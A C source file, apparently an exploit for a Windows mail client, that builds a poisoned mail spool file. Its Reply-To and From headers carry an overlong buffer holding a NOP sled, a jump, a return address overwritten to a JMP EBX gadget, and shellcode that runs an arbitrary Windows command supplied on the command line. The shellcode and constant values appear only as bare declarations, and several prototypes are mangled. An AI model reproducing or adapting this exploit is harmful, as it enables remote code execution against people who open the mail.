
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int FILE ;


 size_t BUFEND ;
 size_t CMDLENP ;
 char* FUNC ;
 char* HEADER1 ;
 char* HEADER2 ;
 size_t JMPADR ;
 int JMP_EBX_ADR ;
 int NOP ;
 int RETADR ;
 int exit (int) ;
 char* exploit_code ;
 int fclose (int *) ;
 int * fopen (char*,char*) ;
 int fprintf (int *,char*,char*) ;
 int fwrite (char*,int,char,int *) ;
 int memset (char*,int ,size_t) ;
 int printf (char*,...) ;
 int strcat (char*,char*) ;
 char strlen (char*) ;
 int strncpy (char*,char*,char) ;

main(int argc,char *argv[])
{
    FILE *fp;
    static char buf[10000];
    int i,r,ip;

    if (argc!=3){
        printf("usage : %s MailSpoolDirectry WindowsCommand\n",argv[0]);
        exit(1);
    }

    if ((fp=fopen(argv[1],"wb"))==((void*)0)){
        printf("Permittion denied :-P\n");
        exit(1);
    }
    fwrite(HEADER1,1,strlen(HEADER1),fp);

    memset(buf,NOP,BUFEND);
    strcat(exploit_code,FUNC);
    strcat(exploit_code,argv[2]);
    exploit_code[CMDLENP]=strlen(argv[2]);
    strncpy(buf+RETADR+4,exploit_code,strlen(exploit_code));

    ip=JMP_EBX_ADR;
    buf[JMPADR] =0xeb;
    buf[JMPADR+1]=0x06;
    buf[RETADR+3]=0xff&(ip>>24);
    buf[RETADR+2]=0xff&(ip>>16);
    buf[RETADR+1]=0xff&(ip>>8);
    buf[RETADR] =ip&0xff;
    buf[BUFEND] =0;

    fprintf(fp,"Reply-To: \"%s\" <hehehe@hohoho.com>\n",buf);
    fprintf(fp,"From: \"%s\" <hehehe@hohoho.com>\n",buf);

    fwrite(HEADER2,1,strlen(HEADER2),fp);
    fclose(fp);
}
